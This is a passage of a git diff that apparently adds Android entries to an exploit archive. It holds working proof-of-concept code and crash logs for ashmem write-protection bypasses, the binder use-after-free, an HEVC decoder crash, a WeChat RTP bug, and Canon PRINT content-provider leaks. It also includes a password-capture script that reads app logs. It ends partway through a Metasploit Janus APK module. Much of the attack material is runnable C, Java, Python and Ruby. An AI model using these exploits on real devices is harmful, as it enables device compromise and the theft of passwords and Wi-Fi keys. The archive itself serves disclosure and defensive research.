+    2648:       aa0003f4        mov     x20, x0
+    264c:       d5384115        mrs     x21, sp_el0
+        if (current->jh_task_flags && mapping)
+    2650:       9128a2a0        add     x0, x21, #0xa28
+    2654:       94000000        bl      0 <__asan_load4>
+    2658:       b94a2aa0        ldr     w0, [x21, #2600]
+    265c:       340000a0        cbz     w0, 2670 <set_page_dirty+0x40>
+    2660:       b40003b4        cbz     x20, 26d4 <set_page_dirty+0xa4>
+                msleep(500);
+    2664:       52803e80        mov     w0, #0x1f4                      // #500
+    2668:       94000000        bl      0 <msleep>
+    266c:       14000002        b       2674 <set_page_dirty+0x44>
+        if (likely(mapping)) {
+    2670:       b4000334        cbz     x20, 26d4 <set_page_dirty+0xa4>
+                int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;
+    2674:       9101a280        add     x0, x20, #0x68
+    2678:       94000000        bl      0 <__asan_load8>
+    267c:       f9403694        ldr     x20, [x20, #104]
+    2680:       91006280        add     x0, x20, #0x18
+    2684:       94000000        bl      0 <__asan_load8>
+    2688:       f9400e94        ldr     x20, [x20, #24]
+    268c:       aa1303e0        mov     x0, x19
+    2690:       94000000        bl      0 <__asan_load8>
+    2694:       f9400260        ldr     x0, [x19]
+==================================
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46941.zip
\ No newline at end of file
diff --git a/exploits/android/dos/47119.txt b/exploits/android/dos/47119.txt
new file mode 100644
index 000000000..bdfa5c31f
--- /dev/null
+++ b/exploits/android/dos/47119.txt
@@ -0,0 +1,79 @@
+CVE-2019-2107 - looks scary. Still remember Stagefright and PNG bugs vulns .... With CVE-2019-2107 the decoder/codec runs under mediacodec user and with properly "crafted" video (with tiles enabled - ps_pps->i1_tiles_enabled_flag) you can possibly do RCE. The codec affected is HVEC (a.k.a H.265 and MPEG-H Part 2) #exploit #rce #android #stagefright #cve
+
+
+More infos
+LineageOS (Android):
+
+02-11 20:18:48.238   260   260 D FFmpegExtractor: ffmpeg detected media content as 'video/hevc' with confidence 0.08
+02-11 20:18:48.239   260   260 I FFMPEG  : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.239   260   260 I FFMPEG  : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] Invalid tile widths.
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] PPS id out of range: 0
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] Error parsing NAL unit #5.
+02-11 20:18:48.240   260   260 I FFMPEG  : [hevc @ 0xb348f000] Invalid tile widths.
+mplayer (laptop)
+
+id: 0
+[hevc @ 0x7f0bf58a7560]Decoding VPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding SPS
+[hevc @ 0x7f0bf58a7560]Main profile bitstream
+[hevc @ 0x7f0bf58a7560]Decoding VUI
+[hevc @ 0x7f0bf58a7560]Decoding PPS
+[hevc @ 0x7f0bf58a7560]Invalid tile widths.
+[hevc @ 0x7f0bf58a7560]Decoding SEI
+[hevc @ 0x7f0bf58a7560]Skipped PREFIX SEI 5
+[hevc @ 0x7f0bf58a7560]PPS id out of range: 0
+[hevc @ 0x7f0bf58a7560]Error parsing NAL unit #5.
+Error while decoding frame!
+This stops it when the tile width is bigger than allowed: https://gitlab.freedesktop.org/gstreamer/meson-ports/ffmpeg/blob/ebf648d490448d511b5fe970d76040169e65ef74/libavcodec/hevc_ps.c#L1526
+
+So the check are there.
+
+On stock/google Andoird I think it will use libhevc, not ffmpeg, when using VideoPlayer.
+
+https://www.droidviews.com/enjoy-hevc-h-265-video-playback-on-android/
+
+I have the google codec:
+
+OMX.google.hevc.decoder
+
+I am wondering however why it does not crash ....
+
+Attaching the video (videopoc.mp4) that should trigger this condition:
+
+if (value >= ps_sps->i2_pic_wd_in_ctb - start)
++                        {
++                            return IHEVCD_INVALID_HEADER;
++                        }
+Maybe somebody have more luck.
+
+More infos 2
+Whoooo hooo .... made it :)
+
+Proof of concept is in hevc-crash-poc.mp4, other videos are for non andoird players.
+
+Hvec-"fright" is possible. You can own the mobile by viewing a video with payload. In my example I didn't include real payload.
+
+07-13 21:50:59.000  3351  3351 I /system/bin/tombstoned: received crash request for pid 24089
+07-13 21:50:59.006 24089 24089 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
+07-13 21:50:59.006 24089 24089 F DEBUG   : Build fingerprint: 'samsung/hero2ltexx/hero2lte:8.0.0/R16NW/G935FXXS4ESC3:user/release-keys'
+07-13 21:50:59.006 24089 24089 F DEBUG   : Revision: '9'
+07-13 21:50:59.006 24089 24089 F DEBUG   : ABI: 'arm64'
+07-13 21:50:59.006 24089 24089 F DEBUG   : pid: 24089, tid: 24089, name: media.extractor  >>> mediaextractor <<<
+07-13 21:50:59.006 24089 24089 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7ccb800050
+07-13 21:50:59.009 24089 24089 F DEBUG   :     x0   00000000ffffff36  x1   0000000000000000  x2   00000000000000f0  x3   0000000000000001
+07-13 21:50:59.009 24089 24089 F DEBUG   :     x4   0000000000000001  x5   0000007ccb5df1b8  x6   0000007cc927363e  x7   0000007cc8e7bd04
+07-13 21:50:59.009 24089 24089 F DEBUG   :     x8   0000000000004170  x9   0000000000004160  x10  00000000ffffffff  x11  0000007ccb7fbef0
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x12  0000007ccb5d3ce0  x13  000000000000001e  x14  0000000000000003  x15  0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x16  0000007cc99f5f50  x17  0000007ccb88885c  x18  0000007ccb566225  x19  0000007ccb562020
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x20  0000007ccb4f18a0  x21  0000007ccb468c6c  x22  0000000000000000  x23  0000000000000006
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x24  000000000000001e  x25  0000000000000094  x26  0000000000004160  x27  0000000000000001
+07-13 21:50:59.010 24089 24089 F DEBUG   :     x28  0000007ccb55e750  x29  0000007fd6d39d90  x30  0000007cc99c4438
+07-13 21:50:59.010 24089 24089 F DEBUG   :     sp   0000007fd6d39d20  pc   0000007cc99c44c4  pstate 0000000080000000
+07-13 21:50:59.013 24089 24089 F DEBUG   : 
+--
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47119.zip
\ No newline at end of file
diff --git a/exploits/android/dos/47920.txt b/exploits/android/dos/47920.txt
new file mode 100644
index 000000000..0945b6491
--- /dev/null
+++ b/exploits/android/dos/47920.txt
@@ -0,0 +1,24 @@
+There is a memory corruption vulnerability in audio processing during a voice call in WeChat. When an RTP packet is processed, there is a call to UnpacketRTP. This function decrements the length of the packet by 12 without checking that the packet has at least 12 bytes in it. This leads to a negative packet length. Then, CAudioJBM::InputAudioFrameToJBM will check that the packet size is smaller than the size of a buffer before calling memcpy, but this check (n < 300) does not consider that the packet length could be negative due to the previous error. This leads to an out-of-bounds copy.
+
+To reproduce the bug:
+
+1) install and run frida on the caller Android device and a desktop host (https://www.frida.re)
+2) copy the filed in the attached directory to /data/local/tmp/packs/, so that /data/local/tmp/packs/opack0 exists
+3) run "setenforce 0" on the caller device
+4) extract replay.py and replay.js into the same directory on a desktop host and run:
+
+python3 replay.py DEVICENAME
+
+Wait for the word "READY" to display.
+
+If you don't know your device name, you can list device names by running:
+
+python3 replay.py
+
+5) start a voice call and answer it on the target device. A crash will occur in about 10 seconds.
+
+A crash log is attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47920.zip
\ No newline at end of file
diff --git a/exploits/android/dos/47921.txt b/exploits/android/dos/47921.txt
new file mode 100644
index 000000000..2e0ed9487
--- /dev/null
+++ b/exploits/android/dos/47921.txt
@@ -0,0 +1,250 @@
+This bug report describes two ways in which an attacker can modify the contents
+of a read-only ashmem fd. I'm not sure at this point what the most interesting
+user of ashmem is in the current Android release, but there are various users,
+including Chrome and a bunch of utility classes.
+In AOSP master, there is even code in
+<https://android.googlesource.com/platform/art/+/master/runtime/jit/jit_memory_region.cc>
+that uses ashmem for some JIT zygote mapping, which sounds extremely
+interesting.
+
+
+Android's ashmem kernel driver has an ->mmap() handler that attempts to lock
+down created VMAs based on a configured protection mask such that in particular
+write access to the underlying shmem file can never be gained. It tries to do
+this as follows (code taken from upstream Linux
+drivers/staging/android/ashmem.c):
+
+    static inline vm_flags_t calc_vm_may_flags(unsigned long prot)
+    {
+            return _calc_vm_trans(prot, PROT_READ,  VM_MAYREAD) |
+                   _calc_vm_trans(prot, PROT_WRITE, VM_MAYWRITE) |
+                   _calc_vm_trans(prot, PROT_EXEC,  VM_MAYEXEC);
+    }
+    [...]
+    static int ashmem_mmap(struct file *file, struct vm_area_struct *vma)
+    {
+            struct ashmem_area *asma = file->private_data;
+    [...]
+            /* requested protection bits must match our allowed protection mask */
+            if ((vma->vm_flags & ~calc_vm_prot_bits(asma->prot_mask, 0)) &
+                calc_vm_prot_bits(PROT_MASK, 0)) {
+                    ret = -EPERM;
+                    goto out;
+            }
+            vma->vm_flags &= ~calc_vm_may_flags(~asma->prot_mask);
+    [...]
+            if (vma->vm_file)
+                    fput(vma->vm_file);
+            vma->vm_file = asma->file;
+    [...]
+            return ret;
+    }
+
+This ensures that the protection flags specified by the caller don't conflict
+with the ->prot_mask, and it also clears the VM_MAY* flags as needed to prevent
+the user from afterwards adding new protection flags via mprotect().
+
+However, it improperly stores the backing shmem file, whose ->mmap() handler
+does not enforce the same restrictions, in ->vm_file. An attacker can abuse this
+through the remap_file_pages() syscall, which grabs the file pointer of an
+existing VMA and calls its ->mmap() handler to create a new VMA. In effect,
+calling remap_file_pages(addr, size, 0, 0, 0) on an ashmem mapping allows an
+attacker to raise the VM_MAYWRITE bit, allowing the attacker to gain write
+access to the ashmem allocation's backing file via mprotect().
+
+
+Reproducer (works both on Linux from upstream master in an X86 VM and on a
+Pixel 2 at security patch level 2019-09-05 via adb):
+
+====================================================================
+user@vm:~/ashmem_remap$ cat ashmem_remap_victim.c
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/wait.h>
+
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)
+
+int main(void) {
+  int ashmem_fd = open("/dev/ashmem", O_RDWR);
+  if (ashmem_fd == -1)
+    err(1, "open ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
+    err(1, "ASHMEM_SET_SIZE");
+  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
+    err(1, "ASHMEM_SET_SIZE");
+  mapping[0] = 'A';
+  printf("mapping[0] = '%c'\n", mapping[0]);
+
+  if (dup2(ashmem_fd, 42) != 42)
+    err(1, "dup2");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child == 0) {
+    execl("./ashmem_remap_attacker", "ashmem_remap_attacker", NULL);
+    err(1, "execl");
+  }
+  int status;
+  if (wait(&status) != child) err(1, "wait");
+  printf("mapping[0] = '%c'\n", mapping[0]);
+}user@vm:~/ashmem_remap$ cat ashmem_remap_attacker.c
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <sys/mman.h>
+#include <err.h>
+#include <stdlib.h>
+#include <stdio.h>
+
+int main(void) {
+  int ashmem_fd = 42;
+
+  /* sanity check */
+  char *write_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (write_mapping == MAP_FAILED) {
+    perror("mmap ashmem writable failed as expected");
+  } else {
+    errx(1, "trivial mmap ashmem writable worked???");
+  }
+
+  char *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem readonly failed");
+
+  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE) == 0)
+    errx(1, "mprotect ashmem writable worked???");
+
+  if (remap_file_pages(mapping, /*size=*/0x1000, /*prot=*/0, /*pgoff=*/0, /*flags=*/0))
+    err(1, "remap_file_pages");
+
+  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))
+    err(1, "mprotect ashmem writable failed, attack didn't work");
+
+  mapping[0] = 'X';
+
+  puts("attacker exiting");
+}user@vm:~/ashmem_remap$ gcc -o ashmem_remap_victim ashmem_remap_victim.c
+user@vm:~/ashmem_remap$ gcc -o ashmem_remap_attacker ashmem_remap_attacker.c
+user@vm:~/ashmem_remap$ ./ashmem_remap_victim
+mapping[0] = 'A'
+mmap ashmem writable failed as expected: Operation not permitted
+attacker exiting
+mapping[0] = 'X'
+user@vm:~/ashmem_remap$ 
+====================================================================
+
+Interestingly, the (very much deprecated) syscall remap_file_pages() isn't even
+listed in bionic's SYSCALLS.txt, which would normally cause it to be blocked by
+Android's seccomp policy; however, SECCOMP_WHITELIST_APP.txt explicitly permits
+it for 32-bit ARM applications:
+
+    # b/36435222
+    int remap_file_pages(void *addr, size_t size, int prot, size_t pgoff, int flags)  arm,x86,mips
+
+
+
+
+ashmem supports purgable memory via ASHMEM_UNPIN/ASHMEM_PIN. Unfortunately,
+there is no access control for these - even if you only have read-only access to
+an ashmem file, you can still mark pages in it as purgable, causing them to
+effectively be zeroed out when the system is under memory pressure. Here's a
+simple test for that (to be run in an X86 Linux VM):
+
+====================================================================
+user@vm:~/ashmem_purging$ cat ashmem_purge_victim.c
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/wait.h>
+
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_SET_PROT_MASK  _IOW(__ASHMEMIOC, 5, unsigned long)
+
+int main(void) {
+  int ashmem_fd = open("/dev/ashmem", O_RDWR);
+  if (ashmem_fd == -1)
+    err(1, "open ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x1000))
+    err(1, "ASHMEM_SET_SIZE");
+  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_PROT_MASK, PROT_READ))
+    err(1, "ASHMEM_SET_SIZE");
+  mapping[0] = 'A';
+  printf("mapping[0] = '%c'\n", mapping[0]);
+
+  if (dup2(ashmem_fd, 42) != 42)
+    err(1, "dup2");
+  pid_t child = fork();
+  if (child == -1)
+    err(1, "fork");
+  if (child == 0) {
+    execl("./ashmem_purge_attacker", "ashmem_purge_attacker", NULL);
+    err(1, "execl");
+  }
+  int status;
+  if (wait(&status) != child) err(1, "wait");
+  printf("mapping[0] = '%c'\n", mapping[0]);
+}
+user@vm:~/ashmem_purging$ cat ashmem_purge_attacker.c
+#include <unistd.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <err.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+
+struct ashmem_pin {
+  unsigned int offset, len;
+};
+
+#define __ASHMEMIOC   0x77
+#define ASHMEM_SET_SIZE   _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_UNPIN    _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
+
+int main(void) {
+  struct ashmem_pin pin = { 0, 0 };
+  if (ioctl(42, ASHMEM_UNPIN, &pin))
+    err(1, "unpin 42");
+
+  /* ensure that shrinker doesn't get skipped */
+  int ashmem_fd = open("/dev/ashmem", O_RDWR);
+  if (ashmem_fd == -1)
+    err(1, "open ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_SET_SIZE, 0x100000))
+    err(1, "ASHMEM_SET_SIZE");
+  char *mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, ashmem_fd, 0);
+  if (mapping == MAP_FAILED)
+    err(1, "mmap ashmem");
+  if (ioctl(ashmem_fd, ASHMEM_UNPIN, &pin))
+    err(1, "unpin 42");
+
+  /* simulate OOM */
+  system("sudo sh -c 'echo 2 > /proc/sys/vm/drop_caches'");
+
+  puts("attacker exiting");
+}
+user@vm:~/ashmem_purging$ gcc -o ashmem_purge_victim ashmem_purge_victim.c
+user@vm:~/ashmem_purging$ gcc -o ashmem_purge_attacker ashmem_purge_attacker.c
+user@vm:~/ashmem_purging$ ./ashmem_purge_victim
+mapping[0] = 'A'
+attacker exiting
+mapping[0] = ''
+user@vm:~/ashmem_purging$ 
+====================================================================
\ No newline at end of file
diff --git a/exploits/android/local/46933.txt b/exploits/android/local/46933.txt
new file mode 100644
index 000000000..317756931
--- /dev/null
+++ b/exploits/android/local/46933.txt
@@ -0,0 +1,48 @@
+#Exploit title: EquityPandit v1.0 - Insecure Logging
+#Date:27/05/2019
+#Exploit Author: ManhNho
+#Software name: "EquityPandit"
+#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
+#Version: 1.0
+# Category: Android apps
+#Description:
+
+   - Sometimes developers keeps sensitive data logged into the developer
+   console. Thus, attacker easy to capture sensitive information like password.
+   - In this application, with adb, attacker can capture password of any
+   users via forgot password function.
+
+#Requirement:
+
+   - Santoku virtual machine
+   - Android virtual machine (installed "EquityPandit" apk file)
+   - Victim user/password: victim@abc.com/123456
+   - Exploit code named capture.py in Santoku vm as below:
+
+import subprocess
+import re
+
+process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
+stdout=subprocess.PIPE)
+dumps = process_handler.stdout.read()
+password_list = re.findall(r'password\s(.*)', dumps)
+print 'Captured %i passwords! \nThey are:' %len(password_list)
+for index, item in enumerate(password_list):
+	print '\t#%i: %s' %(int(index)+1, item)
+
+#Reproduce:
+
+   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)
+
+adb connect x.x.x.x
+
+
+   - Step 2: From Android machine, open EquityPandit, click forgot password
+   function for acccount "victim@abc.com" and then click submit
+   - Step 3: From Santoku, execute capture.py
+   - Actual: Password of "victim@abc.com" will be show in terminal as
+   "123456"
+
+#Demo:
+
+https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv
\ No newline at end of file
diff --git a/exploits/android/local/47321.txt b/exploits/android/local/47321.txt
new file mode 100644
index 000000000..9f51504eb
--- /dev/null
+++ b/exploits/android/local/47321.txt
@@ -0,0 +1,129 @@
+# Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5
+(CVE-2019-14339)
+# Date: 24th July, 2019
+# Exploit Author: 0x48piraj
+# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app
+# Software Link: https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint
+<https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint&hl=en_IN>#
+Exploit : https://github.com/0x48piraj/CVE-2019-14339
+# Version: Canon PRINT 2.5.5
+# Tested on: Android 8.0.0
+# CVE : CVE-2019-14339
+
+The ContentProvider in the Canon PRINT 2.5.5 application for Android
+does not properly restrict data access. This allows an attacker's
+malicious application to obtain sensitive information including
+factory passwords for administrator web-interface and WPA2-PSK key.
+The mobile application contains unprotected exported content providers
+('IJPrinterCapabilityProvider' in android/AndroidManifest.xml) that
+discloses sensitive application’s data under certain conditions. To
+securely export the content provider, one should restrict access to it
+by setting up android:protectionLevel or android:grantUriPermissions
+attributes in Android Manifest file.
+
+-- Proof-of-concept code (Java)
+
+--
+
+package cannon.print.pwn;
+
+import android.database.Cursor;
+import android.net.Uri;
+import android.support.v7.app.AppCompatActivity;
+import android.os.Bundle;
+import android.view.View;
+import android.widget.Button;
+import android.widget.TextView;
+import android.widget.Toast;
+import org.apache.commons.lang3.StringUtils; //
+https://stackoverflow.com/a/50198499
+
+public class MainActivity extends AppCompatActivity {
+
+    Button PwnBtn;
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        super.onCreate(savedInstanceState);
+        setContentView(R.layout.activity_main);
+        PwnBtn = (Button) findViewById(R.id.button);
+        PwnBtn.setOnClickListener(new View.OnClickListener() {
+            @Override
+            public void onClick(View view) {
+                Toast.makeText(getApplicationContext(), "Payload
+triggered ...", Toast.LENGTH_SHORT).show();
+                Uri cannonURI =
+Uri.parse("content://canon.ij.printer.capability.data/");
+                Cursor cursor = getContentResolver().query(cannonURI,
+null, null, null, null);
+                int count  = cursor.getCount();
+                TextView data=(TextView)findViewById(R.id.data);
+                data.setText(String.valueOf(count));
+                cursor.moveToFirst();
+                String tempstr = " ";
+                tempstr ="  "+tempstr +"\t"+ cursor.getString(0) + "\t\t\t"
+                        + cursor.getString(1) + "\t\t\t" + cursor.getString(2);
+                String dpw = StringUtils.substringBetween(tempstr,
+"<ivec:product_serialnumber>", "</ivec:product_serialnumber>");
+                String dmac = cursor.getString(4);
+                String mdeviceid = cursor.getString(13); // raw
+                String dtype = StringUtils.substringBetween(mdeviceid,
+";CLS:", ";DES");
+                String timestamp = cursor.getString(15); // ticks,
+device last used
+                String dclass = StringUtils.substringBetween(tempstr,
+"<ivec:manufacturer>", "</ivec:manufacturer>");
+                String dmodel = StringUtils.substringBetween(tempstr,
+"<ivec:model>", "</ivec:model>");
+                String dserial = StringUtils.substringBetween(tempstr,
+"<ivec:serialnumber>", "</ivec:serialnumber>");
+                String dfmver = StringUtils.substringBetween(tempstr,
+"<ivec:firmver>", "</ivec:firmver>");
+                String dservice =
+StringUtils.substringBetween(tempstr, "<ivec:service>",
+"</ivec:service>");
+                /* More juicy data
+                String denv = StringUtils.substringBetween(tempstr,
+"<vcn:host_environment>", "</vcn:host_environment>");
+                String dpapertype =
+StringUtils.substringBetween(tempstr, "<ivec:papertype>",
+"</ivec:papertype>");
+                String dformats =
+StringUtils.substringBetween(tempstr, "<ivec:support_data_format>",
+"</ivec:support_data_format>");
+                */
+                String fout = String.format("Device Type : %s\nDevice
+Class : %s\nDevice Model : %s\nDevice Serial : %s\nDevice MAC Address
+: %s\nDevice Factory Password : %s\nDevice Firmware Version :
+%s\nDevice Services : %s\nDevice Last Used : %s\n", dtype, dclass,
+dmodel, dserial, dmac, dpw, dfmver, dservice, timestamp);
+                data.setText(fout);
+            }
+        });
+    }
+}
+
+-- Proof-of-concept python script over ADB --
+
+import subprocess, datetime, sys
+
+def ext(out, var, rw=';'):
+    return out.split(var)[1].split(rw)[0]
+
+print("[#] Make sure you've connected the target device w/ adb ...")
+print("[*] Running the exploit using adb ...\n\n")
+out = subprocess.getoutput("adb shell content query --uri content://canon.ij.printer.capability.data/")
+
+if "<ivec:contents>" not in out:
+    print("[!] Error: Couldn't fetch data from adb ...")
+    sys.exit(1)
+
+varz = [";CLS:", ";MDL:", ";DES:", ";VER:", ";PSE:"] #
+factory_pw_check =
+out.split("<ivec:product_serialnumber>")[1].split('</ivec:product_serialnumber>')[0]
+prmz = ["Class", "Model", "Description", "Firmware Version", "Factory Password"]
+for prm, var in zip(prmz, varz):
+	print(" -- Device %s : %s" % (prm, ext(out, var)))
+print(" -- Device MAC Address : {}".format(ext(out, 'mmacaddress=', ',')))
+print(" -- Device Last Used : %s" % (datetime.timedelta(microseconds =
+int(ext(out,', timestamp=', ', '))/10)))
\ No newline at end of file
diff --git a/exploits/android/local/47463.txt b/exploits/android/local/47463.txt
new file mode 100644
index 000000000..986b404af
--- /dev/null
+++ b/exploits/android/local/47463.txt
@@ -0,0 +1,80 @@
+The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others):
+
+There is a use-after-free of the wait member in the binder_thread struct in the binder driver at /drivers/android/binder.c. 
+
+As described in the upstream commit: 
+“binder_poll() passes the thread->wait waitqueue that
+can be slept on for work. When a thread that uses
+epoll explicitly exits using BINDER_THREAD_EXIT,
+the waitqueue is freed, but it is never removed
+from the corresponding epoll data structure. When
+the process subsequently exits, the epoll cleanup
+code tries to access the waitlist, which results in
+a use-after-free.”
+
+The following proof-of-concept will show the UAF crash in a kernel build with KASAN (from initial upstream bugreport at https://lore.kernel.org/lkml/20171213000517.GB62138@gmail.com/):
+        #include <fcntl.h>
+        #include <sys/epoll.h>
+        #include <sys/ioctl.h>
+        #include <unistd.h>
+
+        #define BINDER_THREAD_EXIT 0x40046208ul
+
+        int main()
+        {
+                int fd, epfd;
+                struct epoll_event event = { .events = EPOLLIN };
+
+                fd = open("/dev/binder0", O_RDONLY);
+                epfd = epoll_create(1000);
+                epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
+                ioctl(fd, BINDER_THREAD_EXIT, NULL);
+        }
+
+This issue was patched in Dec 2017 in the 4.14 LTS kernel [1], AOSP android 3.18 kernel [2], AOSP android 4.4 kernel [3], and AOSP android 4.9 kernel [4], but the Pixel 2 with most recent security bulletin is still vulnerable based on source code review. 
+
+Other devices which appear to be vulnerable based on source code review are (referring to 8.x releases unless otherwise stated):
+1) Pixel 2 with Android 9 and Android 10 preview (https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-q-preview-6/)
+2) Huawei P20
+3) Xiaomi Redmi 5A
+4) Xiaomi Redmi Note 5
+5) Xiaomi A1
+6) Oppo A3
+7) Moto Z3
+8) Oreo LG phones (run same kernel according to website)
+9) Samsung S7, S8, S9 
+
+
+*We have evidence that this bug is being used in the wild. Therefore, this bug is subject to a 7 day disclosure deadline. After 7 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.*
+
+
+Confirmed this proof-of-concept works on Pixel 2 with build walleye_kasan-userdebug 10 QP1A.191105.0035899767, causing KASAN crash. Proof of concept C code and new.out attached. KASAN console output attached.
+
+
+I received technical information from TAG and external parties about an Android exploit that is attributed to NSO group. These details included facts about the bug and exploit methodology, including but not limited to:
+ * It is a kernel privilege escalation using a use-after free vulnerability, accessible from inside the Chrome sandbox.
+ * The bug was allegedly being used or sold by the NSO Group. 
+ * It works on Pixel 1 and 2, but not Pixel 3 and 3a. 
+ * It was patched in the Linux kernel >= 4.14 without a CVE. 
+ * CONFIG_DEBUG_LIST breaks the primitive.
+ * CONFIG_ARM64_UAO hinders exploitation.
+ * The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, leading to us suspecting Binder as the vulnerable component.
+ * The exploit requires little or no per-device customization.
+ * A list of affected and unaffected devices and their versions, and more. A non-exhaustive list is available in the description of this issue.
+
+Using these details, I have determined that the bug being used is almost certainly the one in this report as I ruled out other potential candidates by comparing patches. A more detailed explanation of this bug and the methodology to identify it will be written up in a forthcoming blog post when I find the time. 
+
+We do not currently have a sample of the exploit. Without samples, we have neither been able to confirm the timeline nor the payload.
+
+The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox. 
+
+I’ve attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when run locally. It only requires untrusted app code execution to exploit CVE-2019-2215. I’ve also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019 (google/walleye/walleye:10/QP1A.190711.020/5800535:user/release-keys).
+
+
+Vendor statement from Android:
+
+"This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit. We have notified Android partners and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update."
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47463.zip
\ No newline at end of file
diff --git a/exploits/android/local/47601.rb b/exploits/android/local/47601.rb
new file mode 100755
index 000000000..603b11c0b
--- /dev/null
+++ b/exploits/android/local/47601.rb
@@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core/payload/apk'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Android::Priv
+  include Msf::Payload::Android
+
+  def initialize(info={})
+    super( update_info( info, {
+      'Name'           => "Android Janus APK Signature bypass",
+      'Description'    => %q{
+        This module exploits CVE-2017-13156 in Android to install a payload into another
+        application. The payload APK will have the same signature and can be installed
+        as an update, preserving the existing data.
+        The vulnerability was fixed in the 5th December 2017 security patch, and was
+        additionally fixed by the APK Signature scheme v2, so only APKs signed with
+        the v1 scheme are vulnerable.
+        Payload handler is disabled, and a multi/handler must be started first.
+      },
+      'Author'         => [
+        'GuardSquare', # discovery
+        'V-E-O',       # proof of concept
+        'timwr',       # metasploit module
+        'h00die',      # metasploit module
+      ],
+      'References'     => [
+        [ 'CVE', '2017-13156' ],
+        [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
+        [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
+      ],
+      'DisclosureDate' => 'Jul 31 2017',
